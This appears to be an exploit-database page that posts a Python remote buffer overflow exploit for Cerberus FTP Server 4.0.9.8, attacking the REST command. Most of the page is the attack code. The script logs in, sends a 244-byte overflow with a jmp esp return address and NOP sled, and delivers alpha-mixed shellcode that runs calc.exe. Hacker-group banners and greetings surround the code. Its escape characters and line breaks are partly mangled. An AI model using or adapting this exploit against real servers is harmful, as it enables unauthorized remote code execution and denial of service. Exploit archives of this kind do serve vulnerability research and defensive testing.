Home / exploitsPDF  

Cerberus FTP Server 4.0.9.8 Buffer Overflow

Posted on 03 September 2011

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in REST command)
# Tested on : Windows XP SP3 (en)
##

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###

#=====[ Exploit Code ]======>

#!/usr/bin/python

# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team

import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack

if len(sys.argv) != 3:
print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])

# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
shellcode = ("x56x54x58x36x33x30x56x58x48x34x39x48x48x48"
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41"
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58"
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30"
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41"
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42"
"x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4b"
"x58x4ex69x43x30x43x30x43x30x43x50x4fx79x4b"
"x55x45x61x4ex32x43x54x4cx4bx42x72x50x30x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4cx4bx43"
"x42x45x78x46x6fx4dx67x51x5ax51x36x50x31x49"
"x6fx50x31x4bx70x4cx6cx45x6cx43x51x51x6cx47"
"x72x46x4cx51x30x49x51x4ax6fx46x6dx47x71x4a"
"x67x4ax42x4ax50x46x32x51x47x4cx4bx43x62x44"
"x50x4ex6bx42x62x45x6cx47x71x4ex30x4cx4bx47"
"x30x50x78x4ex65x49x50x50x74x51x5ax46x61x4e"
"x30x50x50x4cx4bx51x58x45x48x4ex6bx43x68x45"
"x70x47x71x4bx63x4ax43x45x6cx47x39x4cx4bx47"
"x44x4cx4bx46x61x48x56x50x31x49x6fx46x51x4f"
"x30x4ex4cx4bx71x4ax6fx44x4dx47x71x4ax67x44"
"x78x49x70x44x35x48x74x45x53x51x6dx4ax58x45"
"x6bx51x6dx44x64x44x35x48x62x51x48x4ex6bx51"
"x48x47x54x43x31x4bx63x43x56x4ex6bx46x6cx42"
"x6bx4cx4bx43x68x47x6cx46x61x4ax73x4ex6bx43"
"x34x4ex6bx47x71x48x50x4cx49x51x54x51x34x45"
"x74x43x6bx43x6bx50x61x46x39x51x4ax42x71x4b"
"x4fx4dx30x50x58x51x4fx50x5ax4ex6bx46x72x4a"
"x4bx4bx36x43x6dx51x7ax46x61x4ex6dx4fx75x4d"
"x69x43x30x47x70x45x50x50x50x42x48x44x71x4c"
"x4bx50x6fx4bx37x4bx4fx4ax75x4fx4bx4ax50x4d"
"x65x4ex42x42x76x50x68x4ex46x4ex75x4fx4dx4d"
"x4dx4bx4fx4ex35x47x4cx44x46x51x6cx44x4ax4d"
"x50x49x6bx49x70x42x55x46x65x4fx4bx47x37x45"
"x43x51x62x50x6fx42x4ax47x70x50x53x49x6fx49"
"x45x50x63x51x71x42x4cx42x43x46x4ex50x65x51"
"x68x43x55x45x50x41x41")
buf = "x41" * 244
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
buf += "x90" * 50
buf += shellcode

print "[+]Connecting with server..."
sleep(1)
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(1024)
s.send("USER test
")
s.recv(1024)
s.send("PASS test
")
s.recv(1024)
s.send("REST "+buf+"
")
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))# Connected again to Crash and BOF
sleep(1)
s.close()# Close connection and Crash!!!
print "[+]Exploit sent with sucess"
except:
print "[-]Error in connection with server: "+ip

#=====[ The End ]=======|

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================

 

TOP

Malware :

Exploits :